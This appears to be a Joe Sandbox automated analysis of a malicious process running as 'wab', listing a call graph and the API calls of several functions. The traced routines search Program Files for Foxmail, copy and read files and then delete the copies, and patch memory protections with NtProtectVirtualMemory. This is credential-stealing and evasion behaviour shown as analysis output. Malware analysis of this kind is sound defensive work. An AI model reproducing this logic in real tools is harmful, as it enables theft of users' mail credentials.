6940 33e15af6 38 API calls 6939->6940 6941 33e1766a 6940->6941 6941->6916 6943 33e17834 6942->6943 6944 33e177fd 6942->6944 6946 33e156b9 RtlLeaveCriticalSection 6943->6946 6944->6904 6944->6914 6944->6918 6946->6944 6947->6850 6951 33e156b9 RtlLeaveCriticalSection 6948->6951 6950 33e16e16 6950->6850 6951->6950 6953 33e154c4 6952->6953 6954 33e154ba 6952->6954 6953->6954 6955 33e15af6 38 API calls 6953->6955 6954->6855 6954->6856 6956 33e154e5 6955->6956 6960 33e17a00 6956->6960 6961 33e17a13 6960->6961 6962 33e154fe 6960->6962 6961->6962 6968 33e17f0f 6961->6968 6964 33e17a2d 6962->6964 6965 33e17a40 6964->6965 6966 33e17a55 6964->6966 6965->6966 6967 33e16d7e 38 API calls 6965->6967 6966->6954 6967->6966 6969 33e17f1b 6968->6969 6970 33e15af6 38 API calls 6969->6970 6971 33e17f24 6970->6971 6973 33e17f72 6971->6973 6980 33e15671 RtlEnterCriticalSection 6971->6980 6973->6962 6974 33e17f42 6975 33e17f86 20 API calls 6974->6975 6976 33e17f56 6975->6976 6981 33e17f75 6976->6981 6979 33e155a8 38 API calls 6979->6973 6980->6974 6984 33e156b9 RtlLeaveCriticalSection 6981->6984 6983 33e17f69 6983->6973 6983->6979 6984->6983 6986 33e16baf 6985->6986 6991 33e16b05 6985->6991 6988 33e12ada 5 API calls 6986->6988 6990 33e16c5b 6988->6990 6990->6873 6995 33e186e4 6991->6995 6994 33e18a3e 43 API calls 6994->6986 6996 33e154a7 38 API calls 6995->6996 6997 33e18704 MultiByteToWideChar 6996->6997 6999 33e18742 6997->6999 7000 33e187da 6997->7000 7003 33e156d0 21 API calls 6999->7003 7006 33e18763 6999->7006 7001 33e12ada 5 API calls 7000->7001 7004 33e16b66 7001->7004 7002 33e187d4 7014 33e18801 7002->7014 7003->7006 7009 33e18a3e 7004->7009 7006->7002 7007 33e187a8 MultiByteToWideChar 7006->7007 7007->7002 7008 33e187c4 GetStringTypeW 7007->7008 7008->7002 7010 33e154a7 38 API calls 7009->7010 7011 33e18a51 7010->7011 7018 33e18821 7011->7018 7015 33e1881e 7014->7015 7016 33e1880d 7014->7016 7015->7000 7016->7015 7017 33e1571e 20 API calls 7016->7017 7017->7015 7019 33e1883c 7018->7019 7020 33e18862 MultiByteToWideChar 7019->7020 7021 33e18a16 7020->7021 7022 33e1888c 7020->7022 7023 33e12ada 5 API calls 7021->7023 7025 33e156d0 21 API calls 7022->7025 7027 33e188ad 7022->7027 7024 33e16b87 7023->7024 7024->6994 7025->7027 7026 33e188f6 MultiByteToWideChar 7028 33e1890f 7026->7028 7041 33e18962 7026->7041 7027->7026 7027->7041 7045 33e15f19 7028->7045 7030 33e18801 20 API calls 7030->7021 7032 33e18939 7036 33e15f19 11 API calls 7032->7036 7032->7041 7033 33e18992 7037 33e18a07 7033->7037 7038 33e15f19 11 API calls 7033->7038 7034 33e18971 7034->7033 7035 33e156d0 21 API calls 7034->7035 7035->7033 7036->7041 7039 33e18801 20 API calls 7037->7039 7040 33e189e6 7038->7040 7039->7041 7040->7037 7042 33e189f5 WideCharToMultiByte 7040->7042 7041->7030 7042->7037 7043 33e18a35 7042->7043 7044 33e18801 20 API calls 7043->7044 7044->7041 7046 33e15c45 5 API calls 7045->7046 7047 33e15f40 7046->7047 7050 33e15f49 7047->7050 7053 33e15fa1 7047->7053 7051 33e12ada 5 API calls 7050->7051 7052 33e15f9b 7051->7052 7052->7032 7052->7034 7052->7041 7054 33e15c45 5 API calls 7053->7054 7055 33e15fc8 7054->7055 7056 33e12ada 5 API calls 7055->7056 7057 33e15f89 LCMapStringW 7056->7057 7057->7050 7059 33e16892 7058->7059 7066 33e15671 RtlEnterCriticalSection 7059->7066 7061 33e1689c 7067 33e168f1 7061->7067 7065 33e168b5 7065->6878 7066->7061 7079 33e17011 7067->7079 7069 33e1693f 7070 33e17011 26 API calls 7069->7070 7071 33e1695b 7070->7071 7072 33e17011 26 API calls 7071->7072 7074 33e16979 7072->7074 7073 33e168a9 7076 33e168bd 7073->7076 7074->7073 7075 33e1571e 20 API calls 7074->7075 7075->7073 7093 33e156b9 RtlLeaveCriticalSection 7076->7093 7078 33e168c7 7078->7065 7080 33e17022 7079->7080 7084 33e1701e 7079->7084 7081 33e17029 7080->7081 7085 33e1703c 7080->7085 7082 33e16368 20 API calls 7081->7082 7083 33e1702e 7082->7083 7086 33e162ac 26 API calls 7083->7086 7084->7069 7085->7084 7087 33e17073 7085->7087 7088 33e1706a 7085->7088 7086->7084 7087->7084 7090 33e16368 20 API calls 7087->7090 7089 33e16368 20 API calls 7088->7089 7091 33e1706f 7089->7091 7090->7091 7092 33e162ac 26 API calls 7091->7092 7092->7084 7093->7078 7095 33e1545a 7094->7095 7098 33e15468 7094->7098 7095->7098 7101 33e1547f 7095->7101 7096 33e16368 20 API calls 7097 33e15470 7096->7097 7099 33e162ac 26 API calls 7097->7099 7098->7096 7100 33e1547a 7099->7100 7100->6797 7101->7100 7102 33e16368 20 API calls 7101->7102 7102->7097 7104 33e1500d 7103->7104 7105 33e14fd7 7103->7105 7106 33e15024 7104->7106 7107 33e1571e 20 API calls 7104->7107 7105->6798 7108 33e1571e 20 API calls 7106->7108 7107->7104 7108->7105 5784 33e11c5b 5785 33e11c6b 5784->5785 5788 33e112ee 5785->5788 5787 33e11c87 5789 33e11324 5788->5789 5790 33e113b7 GetEnvironmentVariableW 5789->5790 5814 33e110f1 5790->5814 5793 33e110f1 57 API calls 5794 33e11465 5793->5794 5795 33e110f1 57 API calls 5794->5795 5796 33e11479 5795->5796 5797 33e110f1 57 API calls 5796->5797 5798 33e1148d 5797->5798 5799 33e110f1 57 API calls 5798->5799 5800 33e114a1 5799->5800 5801 33e110f1 57 API calls 5800->5801 5802 33e114b5 lstrlenW 5801->5802 5803 33e114d9 lstrlenW 5802->5803 5813 33e114d2 5802->5813 5804 33e110f1 57 API calls 5803->5804 5805 33e11501 lstrlenW lstrcatW 5804->5805 5806 33e110f1 57 API calls 5805->5806 5807 33e11539 lstrlenW lstrcatW 5806->5807 5808 33e110f1 57 API calls 5807->5808 5809 33e1156b lstrlenW lstrcatW 5808->5809 5810 33e110f1 57 API calls 5809->5810 5811 33e1159d lstrlenW lstrcatW 5810->5811 5812 33e110f1 57 API calls 5811->5812 5812->5813 5813->5787 5815 33e11118 5814->5815 5816 33e11129 lstrlenW 5815->5816 5827 33e12c40 5816->5827 5818 33e11148 lstrcatW lstrlenW 5819 33e11177 lstrlenW FindFirstFileW 5818->5819 5820 33e11168 lstrlenW 5818->5820 5821 33e111e1 5819->5821 5822 33e111a0 5819->5822 5820->5819 5821->5793 5823 33e111c7 FindNextFileW 5822->5823 5824 33e111aa 5822->5824 5823->5822 5826 33e111da FindClose 5823->5826 5824->5823 5829 33e11000 5824->5829 5826->5821 5828 33e12c57 5827->5828 5828->5818 5828->5828 5830 33e11022 5829->5830 5831 33e110af 5830->5831 5832 33e1102f lstrcatW lstrlenW 5830->5832 5835 33e110b5 lstrlenW 5831->5835 5845 33e110ad 5831->5845 5833 33e1106b lstrlenW 5832->5833 5834 33e1105a lstrlenW 5832->5834 5846 33e11e89 lstrlenW 5833->5846 5834->5833 5860 33e11e16 5835->5860 5838 33e11088 GetFileAttributesW 5840 33e1109c 5838->5840 5838->5845 5839 33e110ca 5841 33e11e89 5 API calls 5839->5841 5839->5845 5840->5845 5852 33e1173a 5840->5852 5842 33e110df 5841->5842 5865 33e111ea 5842->5865 5845->5824 5847 33e12c40 5846->5847 5848 33e11ea7 lstrcatW lstrlenW 5847->5848 5849 33e11ed1 lstrcatW 5848->5849 5850 33e11ec2 5848->5850 5849->5838 5850->5849 5851 33e11ec7 lstrlenW 5850->5851 5851->5849 5853 33e11747 5852->5853 5880 33e11cca 5853->5880 5856 33e1199f 5856->5845 5858 33e11824 5858->5856 5900 33e115da 5858->5900 5861 33e11e29 5860->5861 5864 33e11e4c 5860->5864 5862 33e11e2d lstrlenW 5861->5862 5861->5864 5863 33e11e3f lstrlenW 5862->5863 5862->5864 5863->5864 5864->5839 5866 33e1120e 5865->5866 5867 33e11e89 5 API calls 5866->5867 5868 33e11220 GetFileAttributesW 5867->5868 5869 33e11246 5868->5869 5871 33e11235 5868->5871 5870 33e11e89 5 API calls 5869->5870 5872 33e11258 5870->5872 5871->5869 5873 33e1173a 35 API calls 5871->5873 5874 33e110f1 56 API calls 5872->5874 5873->5869 5875 33e1126d 5874->5875 5876 33e11e89 5 API calls 5875->5876 5877 33e1127f 5876->5877 5878 33e110f1 56 API calls 5877->5878 5879 33e112e6 5878->5879 5879->5845 5881 33e11cf1 5880->5881 5882 33e11d0f CopyFileW CreateFileW 5881->5882 5883 33e11d55 GetFileSize 5882->5883 5884 33e11d44 DeleteFileW 5882->5884 5886 33e11ede 22 API calls 5883->5886 5885 33e11808 5884->5885 5885->5856 5890 33e11ede 5885->5890 5887 33e11d66 ReadFile 5886->5887 5888 33e11d94 CloseHandle DeleteFileW 5887->5888 5889 33e11d7d CloseHandle DeleteFileW 5887->5889 5888->5885 5889->5885 5892 33e1222f 5890->5892 5893 33e1224e 5892->5893 5896 33e12250 5892->5896 5908 33e1474f 5892->5908 5913 33e147e5 5892->5913 5893->5858 5895 33e12908 5897 33e135d2 RaiseException 5895->5897 5896->5895 5920 33e135d2 5896->5920 5899 33e12925 5897->5899 5899->5858 5901 33e1160c 5900->5901 5902 33e1163c lstrlenW 5901->5902 6008 33e11c9d 5902->6008 5904 33e11655 lstrcatW lstrlenW 5905 33e11678 5904->5905 5906 33e1167e lstrcatW 5905->5906 5907 33e11693 5905->5907 5906->5907 5907->5858 5923 33e14793 5908->5923 5911 33e1478f 5911->5892 5912 33e14765 5929 33e12ada 5912->5929 5919 33e156d0 5913->5919 5914 33e1570e 5942 33e16368 5914->5942 5916 33e156f9 RtlAllocateHeap 5917 33e1570c 5916->5917 5916->5919 5917->5892 5918 33e1474f 7 API calls 5918->5919 5919->5914 5919->5916 5919->5918 5922 33e135f2 RaiseException 5920->5922 5922->5895 5924 33e1479f 5923->5924 5936 33e15671 RtlEnterCriticalSection 5924->5936 5926 33e147aa 5937 33e147dc 5926->5937 5928 33e147d1 5928->5912 5930 33e12ae3 5929->5930 5931 33e12ae5 IsProcessorFeaturePresent 5929->5931 5930->5911 5933 33e12b58 5931->5933 5941 33e12b1c SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 5933->5941 5935 33e12c3b 5935->5911 5936->5926 5940 33e156b9 RtlLeaveCriticalSection 5937->5940 5939 33e147e3 5939->5928 5940->5939 5941->5935 5945 33e15b7a GetLastError 5942->5945 5946 33e15b93 5945->5946 5947 33e15b99 5945->5947 5964 33e15e08 5946->5964 5951 33e15bf0 SetLastError 5947->5951 5971 33e1637b 5947->5971 5953 33e15bf9 5951->5953 5952 33e15bb3 5978 33e1571e 5952->5978 5953->5917 5957 33e15bb9 5959 33e15be7 SetLastError 5957->5959 5958 33e15bcf 5991 33e1593c 5958->5991 5959->5953 5962 33e1571e 17 API calls 5963 33e15be0 5962->5963 5963->5951 5963->5959 5996 33e15c45 5964->5996 5966 33e15e2f 5967 33e15e47 TlsGetValue 5966->5967 5970 33e15e3b 5966->5970 5967->5970 5968 33e12ada 5 API calls 5969 33e15e58 5968->5969 5969->5947 5970->5968 5977 33e16388 5971->5977 5972 33e163b3 RtlAllocateHeap 5975 33e15bab 5972->5975 5972->5977 5973 33e163c8 5974 33e16368 19 API calls 5973->5974 5974->5975 5975->5952 5984 33e15e5e 5975->5984 5976 33e1474f 7 API calls 5976->5977 5977->5972 5977->5973 5977->5976 5979 33e15752 5978->5979 5980 33e15729 RtlFreeHeap 5978->5980 5979->5957 5980->5979 5981 33e1573e 5980->5981 5982 33e16368 18 API calls 5981->5982 5983 33e15744 GetLastError 5982->5983 5983->5979 5985 33e15c45 5 API calls 5984->5985 5986 33e15e85 5985->5986 5987 33e15ea0 TlsSetValue 5986->5987 5988 33e15e94 5986->5988 5987->5988 5989 33e12ada 5 API calls 5988->5989 5990 33e15bc8 5989->5990 5990->5952 5990->5958 6002 33e15914 5991->6002 5999 33e15c71 5996->5999 6001 33e15c75 5996->6001 5997 33e15c95 6000 33e15ca1 GetProcAddress 5997->6000 5997->6001 5998 33e15ce1 LoadLibraryExW GetLastError LoadLibraryExW FreeLibrary 5998->5999 5999->5997 5999->5998 5999->6001 6000->6001 6001->5966 6003 33e15854 RtlEnterCriticalSection RtlLeaveCriticalSection 6002->6003 6004 33e15938 6003->6004 6005 33e158c4 6004->6005 6006 33e15758 20 API calls 6005->6006 6007 33e158e8 6006->6007 6007->5962 6009 33e11ca6 6008->6009 6009->5904 7301 33e14a9a 7302 33e15411 38 API calls 7301->7302 7303 33e14aa2 7302->7303 7109 33e14bdd 7110 33e14c08 7109->7110 7111 33e14bec 7109->7111 7113 33e16d60 51 API calls 7110->7113 7111->7110 7112 33e14bf2 7111->7112 7114 33e16368 20 API calls 7112->7114 7115 33e14c0f GetModuleFileNameA 7113->7115 7116 33e14bf7 7114->7116 7117 33e14c33 7115->7117 7118 33e162ac 26 API calls 7116->7118 7132 33e14d01 7117->7132 7120 33e14c01 7118->7120 7122 33e14e76 20 API calls 7123 33e14c5d 7122->7123 7124 33e14c72 7123->7124 7125 33e14c66 7123->7125 7127 33e14d01 38 API calls 7124->7127 7126 33e16368 20 API calls 7125->7126 7131 33e14c6b 7126->7131 7129 33e14c88 7127->7129 7128 33e1571e 20 API calls 7128->7120 7130 33e1571e 20 API calls 7129->7130 7129->7131 7130->7131 7131->7128 7134 33e14d26 7132->7134 7136 33e14d86 7134->7136 7138 33e170eb 7134->7138 7135 33e14c50 7135->7122 7136->7135 7137 33e170eb 38 API calls 7136->7137 7137->7136 7141 33e17092 7138->7141 7142 33e154a7 38 API calls 7141->7142 7143 33e170a6 7142->7143 7143->7134 7760 33e1281c 7761 33e12882 27 API calls 7760->7761 7762 33e1282a 7761->7762 6444 34beb74 6447 34bebb5 6444->6447 6445 34bebdd NtProtectVirtualMemory 6445->6447 6446 34bebd4 Sleep 6446->6444 6447->6444 6447->6445 6447->6446

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 33E11137
                                                                                                                                                                                                                          • lstrcatW.KERNEL32(?,?), ref: 33E11151
                                                                                                                                                                                                                          • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 33E1115C
                                                                                                                                                                                                                          • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 33E1116D
                                                                                                                                                                                                                          • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 33E1117C
                                                                                                                                                                                                                          • FindFirstFileW.KERNELBASE(?,?,?,?,?,?,?,?,00000002,00000000), ref: 33E11193
                                                                                                                                                                                                                          • FindNextFileW.KERNELBASE(00000000,00000010), ref: 33E111D0
                                                                                                                                                                                                                          • FindClose.KERNELBASE(00000000), ref: 33E111DB
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.31198447300.0000000033E11000.00000040.00001000.00020000.00000000.sdmp, Offset: 33E10000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000007.00000002.31198418855.0000000033E10000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.31198447300.0000000033E26000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_33e10000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: lstrlen$Find$File$CloseFirstNextlstrcat
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1083526818-0
                                                                                                                                                                                                                          • Opcode ID: a3a6f154fc5fb469bda1cd24c027b58739f9682aa454526f6048ac7270b78f3b
                                                                                                                                                                                                                          • Instruction ID: 30a11a52539d6b60c4ed759c41acc48c9ad413ad0508902331c42784feb40224
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a3a6f154fc5fb469bda1cd24c027b58739f9682aa454526f6048ac7270b78f3b
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6721A575E043586BD710EAA4DC48F9B7BECEF84354F04092AF958D3190E730D6158796
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 130 34beb74-34bebaa 131 34bebb0-34bebbc call 34bed4f 130->131 133 34bebc8-34bebd2 131->133 134 34bebbe-34bebc5 131->134 135 34bebdd-34bec22 NtProtectVirtualMemory call 34bed4f 133->135 136 34bebd4-34bebdb Sleep 133->136 134->133 139 34bec27-34bec3b 135->139 136->130 139->130
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • Sleep.KERNELBASE(00000005), ref: 034BEBD8
                                                                                                                                                                                                                          • NtProtectVirtualMemory.NTDLL(000000FF,-0000101C,-00000018), ref: 034BEC1F
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.31182725171.00000000030E8000.00000040.00000400.00020000.00000000.sdmp, Offset: 030E8000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_30e8000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: MemoryProtectSleepVirtual
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3235210055-0
                                                                                                                                                                                                                          • Opcode ID: acb1ab1f8949bda433b19dbb459f64f7e3c573bc75384fcb3e18a59fe80a2249
                                                                                                                                                                                                                          • Instruction ID: a15981725a8cd637f0577162610e796b43ead6af68db700bdb309f7f86136ed1
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: acb1ab1f8949bda433b19dbb459f64f7e3c573bc75384fcb3e18a59fe80a2249
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 371134B59013009FE704DF35998CBCA73A9AF403A5F16C29AED528F4E5D764C8C6CB11
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetEnvironmentVariableW.KERNEL32(ProgramFiles,?,00000104), ref: 33E11434
                                                                                                                                                                                                                            • Part of subcall function 33E110F1: lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 33E11137
                                                                                                                                                                                                                            • Part of subcall function 33E110F1: lstrcatW.KERNEL32(?,?), ref: 33E11151
                                                                                                                                                                                                                            • Part of subcall function 33E110F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 33E1115C
                                                                                                                                                                                                                            • Part of subcall function 33E110F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 33E1116D
                                                                                                                                                                                                                            • Part of subcall function 33E110F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 33E1117C
                                                                                                                                                                                                                            • Part of subcall function 33E110F1: FindFirstFileW.KERNELBASE(?,?,?,?,?,?,?,?,00000002,00000000), ref: 33E11193
                                                                                                                                                                                                                            • Part of subcall function 33E110F1: FindNextFileW.KERNELBASE(00000000,00000010), ref: 33E111D0
                                                                                                                                                                                                                            • Part of subcall function 33E110F1: FindClose.KERNELBASE(00000000), ref: 33E111DB
                                                                                                                                                                                                                          • lstrlenW.KERNEL32(?), ref: 33E114C5
                                                                                                                                                                                                                          • lstrlenW.KERNEL32(?), ref: 33E114E0
                                                                                                                                                                                                                          • lstrlenW.KERNEL32(?,?), ref: 33E1150F
                                                                                                                                                                                                                          • lstrcatW.KERNEL32(00000000), ref: 33E11521
                                                                                                                                                                                                                          • lstrlenW.KERNEL32(?,?), ref: 33E11547
                                                                                                                                                                                                                          • lstrcatW.KERNEL32(00000000), ref: 33E11553
                                                                                                                                                                                                                          • lstrlenW.KERNEL32(?,?), ref: 33E11579
                                                                                                                                                                                                                          • lstrcatW.KERNEL32(00000000), ref: 33E11585
                                                                                                                                                                                                                          • lstrlenW.KERNEL32(?,?), ref: 33E115AB
                                                                                                                                                                                                                          • lstrcatW.KERNEL32(00000000), ref: 33E115B7
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.31198447300.0000000033E11000.00000040.00001000.00020000.00000000.sdmp, Offset: 33E10000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000007.00000002.31198418855.0000000033E10000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.31198447300.0000000033E26000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_33e10000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: lstrlen$lstrcat$Find$File$CloseEnvironmentFirstNextVariable
                                                                                                                                                                                                                          • String ID: )$Foxmail$ProgramFiles
                                                                                                                                                                                                                          • API String ID: 672098462-2938083778
                                                                                                                                                                                                                          • Opcode ID: 1c89c108811414104b518295229a334483a23229f1929a5fd060763de67e3b43
                                                                                                                                                                                                                          • Instruction ID: 57da558be29657781452decf0c20cb06ffa425ba944ea7d7ef913169e455fc54
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1c89c108811414104b518295229a334483a23229f1929a5fd060763de67e3b43
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7881B175E10398AADB20DBA1DC45FEF7779EF84700F000596F608E7190EAB15A94CF95
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(33E1C7DD), ref: 33E1C7E6
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(?,33E1C7DD), ref: 33E1C838
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 33E1C860
                                                                                                                                                                                                                            • Part of subcall function 33E1C803: GetProcAddress.KERNEL32(00000000,33E1C7F4), ref: 33E1C804
                                                                                                                                                                                                                            • Part of subcall function 33E1C803: VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,33E1C7F4,33E1C7DD), ref: 33E1C816
                                                                                                                                                                                                                            • Part of subcall function 33E1C803: VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,33E1C7F4,33E1C7DD), ref: 33E1C82A
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.31198447300.0000000033E11000.00000040.00001000.00020000.00000000.sdmp, Offset: 33E10000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000007.00000002.31198418855.0000000033E10000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.31198447300.0000000033E26000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_33e10000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: AddressHandleModuleProcProtectVirtual
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2099061454-0
                                                                                                                                                                                                                          • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                                                                                                                                                          • Instruction ID: 3223371db5680175efd97e20733fe3ab168bae515a8f87f44b1890efd4ae60e4
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3E012280D5537038FB1056B4CCC3AEA5FA89B636A8B18175AE050C6493C9E0A132C3B6
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 80 33e1c7a7-33e1c7bc 81 33e1c82d 80->81 82 33e1c7be-33e1c7c6 80->82 84 33e1c82f-33e1c833 81->84 82->81 83 33e1c7c8-33e1c7f6 call 33e1c7e6 82->83 91 33e1c7f8 83->91 92 33e1c86c 83->92 86 33e1c872 call 33e1c877 84->86 87 33e1c835-33e1c83d GetModuleHandleA 84->87 90 33e1c83f-33e1c847 87->90 90->90 93 33e1c849-33e1c84c 90->93 96 33e1c85b-33e1c85e 91->96 97 33e1c7fa-33e1c7fc 91->97 95 33e1c86d-33e1c86e 92->95 93->84 94 33e1c84e-33e1c850 93->94 98 33e1c852-33e1c854 94->98 99 33e1c856-33e1c85a 94->99 101 33e1c870 95->101 102 33e1c866-33e1c86b 95->102 100 33e1c85f-33e1c860 GetProcAddress 96->100 97->95 103 33e1c7fe 97->103 98->100 99->96 104 33e1c865 100->104 101->93 102->92 103->104 105 33e1c800-33e1c80b GetProcAddress 103->105 104->102 105->81 106 33e1c80d-33e1c81a VirtualProtect 105->106 107 33e1c82c 106->107 108 33e1c81c-33e1c82a VirtualProtect 106->108 107->81 108->107
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(?,33E1C7DD), ref: 33E1C838
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 33E1C860
                                                                                                                                                                                                                            • Part of subcall function 33E1C7E6: GetModuleHandleA.KERNEL32(33E1C7DD), ref: 33E1C7E6
                                                                                                                                                                                                                            • Part of subcall function 33E1C7E6: GetProcAddress.KERNEL32(00000000,33E1C7F4), ref: 33E1C804
                                                                                                                                                                                                                            • Part of subcall function 33E1C7E6: VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,33E1C7F4,33E1C7DD), ref: 33E1C816
                                                                                                                                                                                                                            • Part of subcall function 33E1C7E6: VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,33E1C7F4,33E1C7DD), ref: 33E1C82A
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.31198447300.0000000033E11000.00000040.00001000.00020000.00000000.sdmp, Offset: 33E10000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000007.00000002.31198418855.0000000033E10000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.31198447300.0000000033E26000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_33e10000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: AddressHandleModuleProcProtectVirtual
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2099061454-0
                                                                                                                                                                                                                          • Opcode ID: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                                                                                                                                                                                          • Instruction ID: 4451dd5641bfd59a74cf83f0c6797895464eabdbe4a4fe229c91bf1984514d76
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 11212965C183B16FF7114B74DC827E56FE89B533A8F1C0696D040CB543D5E4A465C3A2
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 109 33e1c803-33e1c80b GetProcAddress 110 33e1c82d 109->110 111 33e1c80d-33e1c81a VirtualProtect 109->111 114 33e1c82f-33e1c833 110->114 112 33e1c82c 111->112 113 33e1c81c-33e1c82a VirtualProtect 111->113 112->110 113->112 115 33e1c872 call 33e1c877 114->115 116 33e1c835-33e1c83d GetModuleHandleA 114->116 118 33e1c83f-33e1c847 116->118 118->118 119 33e1c849-33e1c84c 118->119 119->114 120 33e1c84e-33e1c850 119->120 121 33e1c852-33e1c854 120->121 122 33e1c856-33e1c85e 120->122 123 33e1c85f-33e1c865 GetProcAddress 121->123 122->123 126 33e1c866-33e1c86e 123->126 129 33e1c870 126->129 129->119
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,33E1C7F4), ref: 33E1C804
                                                                                                                                                                                                                          • VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,33E1C7F4,33E1C7DD), ref: 33E1C816
                                                                                                                                                                                                                          • VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,33E1C7F4,33E1C7DD), ref: 33E1C82A
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(?,33E1C7DD), ref: 33E1C838
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 33E1C860
                                                                                                                                                                                                                          Memory Dump Source
